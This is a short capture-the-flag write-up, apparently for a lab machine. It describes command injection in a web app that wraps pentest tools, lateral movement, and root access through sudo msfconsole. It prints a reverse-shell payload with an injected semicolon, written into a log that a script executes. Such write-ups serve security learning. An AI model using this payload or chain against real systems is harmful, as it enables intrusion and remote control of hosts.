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  • Exploit functionality of web app with a APK template command injection attack
  • Use user’s shell script to access new user’s account
  • Escalate privileges with msfconsole


Our initial nmap scan of running services and safe scripts shows both ssh and a web app running on port 5000.

Navigating to the website we can see what seems to be a script kiddies web app that utilizes common tools(nmap,msfvenom,searchsploit).


After looking into the tools and using google I found that I could use this exploit to get a reverse shell on the web server.

From here I used

bash -i

to get a interactive/better shell.

Lateral Movement:

I am able to access the other user on the system “pwn” and find an interesting shell script “”.

I saw that this script took input from the log located /home/kid/logs/hackers and ran a shell command from that input.

I used the vi editor and input the following command into the log file (emphasis on the 3 spaces) in a way that I would get a reverse shell.

   ;/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'   #

Privilege Escalation:

Priv esc was fairly easy as pwn had privileges to use msfconsole as sudo.

To check if the user can use any commands as sudo use the following command:

sudo -l

From here the path to root is simpley to use the path to metasploit found from the sudo -l command to access the root folder flag.

Also, I highly recommend if you are learning shell commands to head over to as it was extremely helpful with this box and will be in the future (at least for me)